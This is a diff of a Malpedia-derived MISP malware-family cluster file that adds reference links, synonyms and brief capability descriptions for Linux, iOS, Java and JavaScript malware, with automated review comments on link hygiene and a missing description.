"https://malpedia.caad.fkie.fraunhofer.de/details/elf.tntbotinger", + "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "00319b53-e31c-4623-a3ac-9a18bc52bf36", + "value": "TNTbotinger" + }, { "description": "", "meta": { 
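Review bot: The new `TeamTNT` cluster ships with `"description": ""` although its value is a threat-group name rather than a malware family, which is the only such case among the ELF entries added in this hunk and is easy to confuse with an actor cluster when tagging events. A one-line description would disambiguate, e.g. `"description": "Malpedia family bucket for Linux tooling attributed to the TeamTNT cryptojacking group (see refs); this is not the actor cluster."` — the refs titles (credential-stealing mining worm, detection-evasion tool, Hildegard) support that wording without claiming more. As descriptions in this file come from the Malpedia export, the text should be submitted there rather than hand-edited here.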
@@ -1866,15 +4001,52 @@ "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883", "value": "Trump Bot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tscookie", + "https://blogs.jpcert.or.jp/en/2020/03/elf-tscookie.html", + "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", + "https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf", + "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape" + ], + "synonyms": [], + "type": [] + }, + "uuid": "592f7cc6-1e07-4d83-8082-aef027e9f1e2", + "value": "TSCookie" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsh", + "https://github.com/creaktive/tsh" + ], + "synonyms": [], + "type": [] + }, + "uuid": "95a07de2-0e17-48a7-b935-0c1c0c0e39af", + "value": "tsh" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", + "https://blog.aquasec.com/fileless-malware-container-security", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "http://get.cyberx-labs.com/radiation-report", - 
"https://www.8ackprotect.com/blog/big_brother_is_attacking_you", - "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/" + "https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/" ], "synonyms": [ "Amnesia", 
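Review bot: The re-added Tsunami reference `"http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/"` is plain http, as is the retained `http://get.cyberx-labs.com/radiation-report`, while every other reference added in this hunk is https. Analysts open these links directly from MISP, so the https form should be used wherever the host serves one (the Palo Alto host does), and any reference that only resolves over http is worth a second look for link rot. The Tsunami entry's synonyms list continues past the end of the hunk.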
@@ -1914,16 +4086,48 @@ "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460", "value": "Umbreon" }, + { + "description": "According to Cybereason, these scripts have been used in an ongoing campaign exploiting a widespread vulnerability in linux email servers. This attack leverages a week-old vulnerability to gain remote command execution on the target machine, search the Internet for other machines to infect, and initiates a crypto miner.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_001", + "https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b5b59d9f-f9e2-4201-a017-f2bae0470808", + "value": "Unidentified Linux 001" + }, + { + "description": "Golang-based RAT that offers execution of shell commands and download+run capability. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_002", + "https://labs.bitdefender.com/2020/10/theres-a-new-a-golang-written-rat-in-town/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7c516b66-f4a4-406a-bf35-d898ac8bffec", + "value": "Unidentified Linux 002" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter", + "https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html", "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", + "https://i.blackhat.com/USA-19/Thursday/us-19-Doerr-The-Enemy-Within-Modern-Supply-Chain-Attacks.pdf", "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html", "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/", "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + 
"https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html", "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", + "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", + "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/", "https://blog.talosintelligence.com/2018/05/VPNFilter.html", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en", "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware" 
@@ -1934,11 +4138,56 @@ "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500", "value": "elf.vpnfilter" }, + { + "description": "According to Intezer, this is a spreader module used by WatchBog. It is a dynamically linked ELF executable, compiled with Cython. C&C adresses are fetched from Pastebin. C&C communication references unique identification keys per victim. It contains a BlueKeep scanner, reporting positively scanned hosts to the C&C server (RC4 encrypted within SSL/TLS). It contains 5 exploits targeting Jira, Exim, Solr, Jenkins and Nexus Repository Manager 3. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.watchbog", + "https://intezer.com/blog/linux/watching-the-watchbog-new-bluekeep-scanner-and-linux-exploits/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "aa00d8c9-b479-4d05-9887-cd172a11cfc9", + "value": "WatchBog" + }, { "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess" + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmail", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmail.html", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "93ffafbd-a8af-4164-b3ab-9b21e6d09232", + "value": "WellMail" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess", + 
"https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html" ], "synonyms": [], "type": [] @@ -1946,6 +4195,21 @@ "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de", "value": "elf.wellmess" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d6c5211e-506d-415c-b886-0ced529399a1", + "value": "Winnti (ELF)" + }, { "description": "", "meta": { 
@@ -1965,11 +4229,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent", + "https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/", - "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" + "https://www.secureworks.com/research/threat-profiles/iron-twilight", + "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" ], "synonyms": [ "chopstick", @@ -1981,6 +4248,19 @@ "uuid": "a8404a31-968a-47e8-8434-533ceaf84c1f", "value": "X-Agent (ELF)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xanthe", + "https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "55b4d75f-adcc-47df-81cf-6c93ccb54a56", + "value": "Xanthe" + }, { "description": "", "meta": { 
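Review bot: The X-Agent (ELF) refs now list the same Unit 42 article twice, once as `"https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/"` and once under the legacy host `"http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"` with an identical slug. Keep only the https unit42 URL unless the two are known to resolve to different content, which nothing in the hunk suggests. Because the file is a Malpedia export, the deduplication should be done in the upstream reference list so the next regeneration does not reintroduce it; the entry's synonyms array continues outside the hunk.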
@@ -2012,11 +4292,22 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", + "https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/", + "https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf", + "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html", + "http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html", "https://en.wikipedia.org/wiki/Xor_DDoS", + "https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/", + "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/", "https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html", - "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html" + "https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/" + ], + "synonyms": [ + "XORDDOS" ], - "synonyms": [], "type": [] }, "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", 
@@ -2080,6 +4371,38 @@ "uuid": "d9215579-eee0-4e50-9157-dba7c3214769", "value": "GuiInject" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.lightspy", + "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/", + "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8a1b524b-8fc9-4b1d-805d-c0407aff00d7", + "value": "lightSpy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.poisoncarp", + "https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/", + "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html" + ], + "synonyms": [ + "INSOMNIA" + ], + "type": [] + }, + "uuid": "7982cc15-f884-40ca-8a82-a452b9c340c7", + "value": "PoisonCarp" + }, { "description": "The iOS malware that is installed over USB by osx.wirelurker", "meta": { 
@@ -2093,18 +4416,38 @@ "uuid": "bb340271-023c-4283-9d22-123317824a11", "value": "WireLurker (iOS)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.xagent", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", + "https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "430b9f30-5e37-49c8-b4e7-21589f120d89", + "value": "X-Agent (iOS)" + }, { "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. 
Malspam URL to downlaod the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", - "https://blogs.seqrite.com/evolution-of-jrat-java-malware/", + "https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html", "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", - "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", + "https://blogs.seqrite.com/evolution-of-jrat-java-malware/", + "https://research.checkpoint.com/malware-against-the-c-monoculture/", "http://malware-traffic-analysis.net/2017/07/04/index.html", - "https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", - "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html" + "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat", + "https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/", + "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/", + "https://citizenlab.ca/2015/12/packrat-report/" ], "synonyms": [ "AlienSpy", 
@@ -2119,6 +4462,19 @@
 "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c",
 "value": "AdWind"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adzok",
+ "https://citizenlab.ca/2015/12/packrat-report/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "90cb8ee6-52e6-4d8d-8f45-f04b9aec1f6c",
+ "value": "Adzok"
+ },
 {
 "description": "",
 "meta": {
@@ -2134,6 +4490,19 @@
 "uuid": "30a61fa9-4bd1-427d-9382-ff7c33bd7043",
 "value": "Banload"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.bluebanana",
+ "https://www.virustotal.com/gui/file/60faab36491e07f10bf6a3ebe66ed9238459b2af7e36118fccd50583728141a4/community"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c51bbc9b-0906-4ac5-8026-d6b8b7b23e71",
+ "value": "Blue Banana RAT"
+ },
 {
 "description": "",
 "meta": {
@@ -2164,11 +4533,25 @@ "value": "FEimea RAT" }, { - "description": "", + "description": "According to Karsten Hahn, this malware is actually written in JPHP, but can be treated similar to .class files produced by Java. IceRat has been observed to carry out information stealing and mining.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.icerat", + "https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ac83a481-2ab4-42c2-a8b6-a4aec96e1c4b", + "value": "IceRat" + }, + { + "description": "JavaDispCash is a piece of malware designed for ATMs. The compromise happens by using the JVM attach-API on the ATM's local application and the goal is to remotely control its operation. The malware's primary feature is the ability to dispense cash. The malware also spawns a local port (65413) listening for commands from the attacker which needs to be located in the same internal network.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.javadispcash", - "https://twitter.com/r3c0nst/status/1111254169623674882" + "https://twitter.com/r3c0nst/status/1111254169623674882", + "https://github.com/fboldewin/Libertad-y-gloria---A-Mexican-cyber-heist-story---CyberCrimeCon19-Singapore" ], "synonyms": [], "type": [] 
@@ -2176,15 +4559,32 @@
 "uuid": "71286008-9794-4dcc-a571-164195390c39",
 "value": "JavaDispCash"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.javalocker",
+ "https://dissectingmalwa.re/why-would-you-even-bother-javalocker.html",
+ "https://id-ransomware.blogspot.com/2020/03/javalocker-ransomware.html"
+ ],
+ "synonyms": [
+ "JavaEncrypt Ransomware"
+ ],
+ "type": []
+ },
+ "uuid": "4bdddf41-8d5e-468d-905d-8c6667a5d47f",
+ "value": "JavaLocker"
+ },
 {
 "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat",
- "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered",
+ "https://www.eff.org/files/2018/01/29/operation-manul.pdf",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/",
- "https://github.com/java-rat",
- "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/"
+ "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/",
+ "https://research.checkpoint.com/malware-against-the-c-monoculture/",
+ "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered"
 ],
 "synonyms": [
 "Jacksbot"
@@ -2207,13 +4607,26 @@
 "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f",
 "value": "jSpy"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.octopus_scanner",
+ "http://blog.nsfocus.net/github-ocs-0605/",
+ "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8ae996fe-50bb-479b-925c-e6b1e51a9b40",
+ "value": "Octopus Scanner"
+ },
 {
 "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat",
- "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/",
- "https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/"
+ "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/"
 ],
 "synonyms": [],
 "type": []
@@ -2226,9 +4639,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qealler",
- "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer"
+ "https://www.securityinbits.com/malware-analysis/unpacking/unpacking-pyrogenic-qealler-using-java-agent-part-0x2/",
+ "https://www.securityinbits.com/malware-analysis/pyrogenic-infostealer-static-analysis-part-0x1/",
+ "https://www.cyberark.com/threat-research-blog/qealler-the-silent-java-credential-thief/",
+ "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer",
+ "https://www.securityinbits.com/malware-analysis/similarity-between-qealler-pyrogenic-variants-part-0x3/",
+ "https://github.com/jeFF0Falltrades/Malware-Writeups/blob/master/Qealler/Qealler-Unloaded.pdf",
+ "https://www.herbiez.com/?p=1352"
+ ],
+ "synonyms": [
+ "Pyrogenic Infostealer"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "d16a3a1f-e244-4715-a67f-61ba30901efb",
@@ -2240,7 +4661,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat",
 "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/",
- "https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-spam-the-nodejs-qrat/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/",
 "https://www.digitrustgroup.com/java-rat-qrat/"
 ],
 "synonyms": [
@@ -2256,7 +4678,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty",
- "https://github.com/shotskeber/Ratty"
+ "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/"
 ],
 "synonyms": [],
 "type": []
@@ -2264,6 +4686,19 @@
 "uuid": "da032a95-b02a-4af2-b563-69f686653af4",
 "value": "Ratty"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat",
+ "https://www.gdatasoftware.com/blog/strrat-crimson"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6d1335d5-8351-4725-ad8a-07cabca4119e",
+ "value": "STRRAT"
+ },
 {
 "description": "",
 "meta": {
@@ -2284,7 +4719,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak",
- "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html"
+ "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html",
+ "http://www.kahusecurity.com/posts/reflow_javascript_backdoor.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk"
 ],
 "synonyms": [
 "Orz"
@@ -2299,6 +4736,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
 "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
 ],
 "synonyms": [],
@@ -2308,10 +4747,11 @@
 "value": "Bateleur"
 },
 {
- "description": "• BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n• Creating a Run key in the Registry\r\n• Creating a RunOnce key in the Registry\r\n• Creating a persistent named scheduled task\r\n• BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n",
+ "description": "\u2022 BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n\u2022 Creating a Run key in the Registry\r\n\u2022 Creating a RunOnce key in the Registry\r\n\u2022 Creating a persistent named scheduled task\r\n\u2022 BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
 "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
 ],
 "synonyms": [],
@@ -2325,6 +4765,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch",
+ "https://www.macnica.net/file/mpression_automobile.pdf",
+ "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf",
+ "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/",
 "https://www.codercto.com/a/46729.html",
 "https://github.com/mdsecactivebreach/CACTUSTORCH"
 ],
@@ -2368,7 +4811,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.dnsrat",
- "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/"
+ "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
 ],
 "synonyms": [
 "DNSbot"
@@ -2378,13 +4822,35 @@
 "uuid": "a4b40d48-e40b-47f2-8e30-72342231503e",
 "value": "DNSRat"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.enrume",
+ "https://blog.emsisoft.com/de/21077/meet-ransom32-the-first-javascript-ransomware/"
+ ],
+ "synonyms": [
+ "Ransom32"
+ ],
+ "type": []
+ },
+ "uuid": "d6e5f6b7-cafb-476d-958c-72debdabe013",
+ "value": "Enrume"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.evilnum",
+ "https://github.com/eset/malware-ioc/tree/master/evilnum",
+ "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw",
+ "https://securelist.com/deathstalker-mercenary-triumvirate/98177/",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html",
+ "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf",
+ "http://www.pwncode.io/2018/05/javascript-based-bot-using-github-c.html",
 "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/",
- "http://www.pwncode.club/2018/05/javascript-based-bot-using-github-c.html"
